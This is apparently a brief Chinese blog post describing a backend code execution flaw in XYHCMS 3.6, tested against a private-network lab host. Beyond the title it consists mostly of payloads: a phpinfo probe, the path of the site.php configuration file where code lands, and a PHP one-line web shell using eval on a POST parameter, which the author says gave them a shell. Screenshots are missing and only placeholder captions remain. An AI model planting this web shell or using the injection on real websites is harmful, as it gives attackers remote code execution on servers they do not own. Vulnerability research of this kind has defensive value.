XYHCMS 3.6 後臺程式碼執行漏洞

fuqin.ltd發表於2020-12-29

XYHCMS 3.6 後臺程式碼執行漏洞

<?=phpinfo();?>

在這裡插入圖片描述
http://192.168.107.131:1026/App/Runtime/Data/config/site.php
在這裡插入圖片描述
經過多次實驗終於拿到shell <?php @eval($_POST[5]);?>
在這裡插入圖片描述
在這裡插入圖片描述
在這裡插入圖片描述
需要環境的私聊後期會放到站上

相關文章